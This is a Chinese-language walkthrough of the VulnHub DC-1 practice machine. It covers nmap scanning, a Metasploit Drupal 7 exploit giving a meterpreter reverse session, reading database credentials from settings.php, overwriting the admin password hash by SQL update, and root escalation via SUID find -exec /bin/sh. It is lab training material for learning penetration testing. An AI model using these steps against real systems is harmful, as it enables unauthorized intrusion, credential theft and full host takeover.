DC-1靶机攻略

靶机地址

https://www.vulnhub.com/entry/dc-1-1,292/
DC-1.zip (Size: 733 MB)
Download: http://www.five86.com/downloads/DC-1.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-1.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-1.zip.torrent ( Magnet)

靶机描述

DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.
To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.

There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.

There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.

Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.

Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

信息收集

攻击机地址:192.168.0.102
靶机地址:192.168.0.119
任务目标:根据靶机描述有5个flag需要获取。

首先NMAP进行探测,nmap -sP 192.168.0.0/24 确定靶机IP为192.168.0.119,进行全端口探测:nmap -A -p- -v 192.168.0.119
DC-1靶机攻略
发现开放22、80、111端口,先打开80查看页面,根据nmap结果可知当前运行的是Drupal 7的CMS
DC-1靶机攻略

漏洞利用及提权

搜索Drupal 7的漏洞发现其实可利用的漏洞蛮多的
DC-1靶机攻略
进入msf后搜索Drupal进行利用
DC-1靶机攻略
使用show options看下要设置的内容,需要设置目标IPset RHOSTS 192.168.0.119设置攻击机IP set LHOST 192.168.0.102接着run获取 meterpreter 会话:
DC-1靶机攻略
获取会话后先搞个shell
DC-1靶机攻略
再用
python3 -c 'import pty;pty.spawn("/bin/bash")
export TERM=xterm
搞成交互式shell,然后就发现当前目录下存在flag1.txt,提示我们查看配置文件:
DC-1靶机攻略
经过搜索知道drupal配置文件存放路径为 sites/default/settings.php
查看文件发现flag2,发现数据库账户口令,那就尝试连接下数据库
DC-1靶机攻略
成功连接数据库后在drupal库中发现user表,然后在user中发现了账户密码
DC-1靶机攻略
发现admin账号和经过加密的密码,drupal常用密码加密是MD5格式,但是7.0以后因为安全性问题将加密方式改成了hash加密,由于很多在线MD5爆破和MD5数据库,可以查到很多MD5码的原文,所以Drupal 7已不再采用简单的MD5加密,而是采用一种新型的Hash加密方法,新型加密方法是加盐MD5码,这里不是MD5,应该是Drupal 7是自定义的加密方式。结合flag2 的提示暴力破解不是唯一的方式,那这里爆破也可以,也可以去采用其他方式,如尝试重置密码、添加新的管理员(从searchsploit结果中可知有添加管理员漏洞)等
这里采用重置密码的方式,Drupal 7 的密码hash脚本存放于script目录下的password-hash.sh
DC-1靶机攻略
通过php scripts/password-hash.sh 123 创建123的hash,接下来再hash密码更新进user表中
DC-1靶机攻略
通过命令更新密码:update users set pass="$S$DMHrgiAJFOw9uyksr.7CaAWWS1eMIGnGmCCjFFZrNdaDIg4dcw8B" where uid=1;,更新密码后使用admin/123进行登录,在content发现flag3
DC-1靶机攻略

这里的关键词是 PERMS、FIND、passwd、-exec、shadow
查看/etc/passwd 发现flag4用户
DC-1靶机攻略
然后再flag4的用户目录下发现flag4.txt
DC-1靶机攻略
根据提示我们要提权至root去找最后的flag了,使用find命令查找有特殊权限suid的命令:find / -perm -4000
DC-1靶机攻略
再使用find 命令进行提权:find ./misc -exec "/bin/sh" \;
DC-1靶机攻略
获取root 权限,然后在root目录下发现thefinalflag.txt
DC-1靶机攻略

总结

主要考点:
Drupal 7 漏洞利用
find 提权

参考文章
https://blog.csdn.net/weixin_43583637/article/details/101542749
https://blog.csdn.net/weixin_40860777/article/details/105118966

上一篇:LINUX重启MYSQL的命令


下一篇:点餐系统mealsystem.sql